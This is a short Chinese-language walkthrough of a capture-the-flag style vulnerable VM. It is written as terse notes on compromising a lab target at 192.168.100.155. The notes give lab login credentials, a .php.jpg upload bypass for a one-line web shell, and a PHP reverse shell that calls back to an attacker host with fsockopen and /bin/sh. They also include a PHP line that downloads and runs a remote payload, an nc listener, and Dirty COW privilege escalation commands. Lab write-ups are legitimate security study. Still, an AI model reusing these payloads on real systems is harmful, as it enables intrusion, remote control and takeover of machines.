
目标主机IP：192.168.100.155

../shell/xinxi.sh 155

通过其他工具也没有扫描出网站的可利用目录，没办法，只能将主页上有的单词全都尝试了一遍，拼接到链接后面；
终于在图片上的文字“keep calm and drink fristi”中尝试成功；
加密的字符串应该是base64编码，并且加密的是一张图片；
eezeepz   keKkeKKeKKeKkEkkEk

发现使用.php.jpg可以上传成功并执行，果断传一个一句话shell。

使用中国菜刀链接

其他方式获取反弹shell

Kali上写个PHP反弹shell的脚本；并开启Apache服务
<?php $sock=fsockopen("192.168.100.143",1234);exec("/bin/sh -i <&3 >&3 2>&3");?>

物理机上写个下载并执行该脚本的PHP代码
<?php system("wget 192.168.100.143/shell.txt -O /tmp/shell.php; php /tmp/shell.php");?>

在Kali上监听1234端口；浏览器去访问上传的shell1.php.jpg，成功获取目标的shell
nc -vnlp 1234

将shell转换为交互式的tty
python -c 'import pty;pty.spawn("/bin/bash")'  



脏牛提权
wget 192.168.100.143/dirty.c
gcc -pthread dirty.c -o exp -lcrypt
./exp 123.com

firefart 123.com

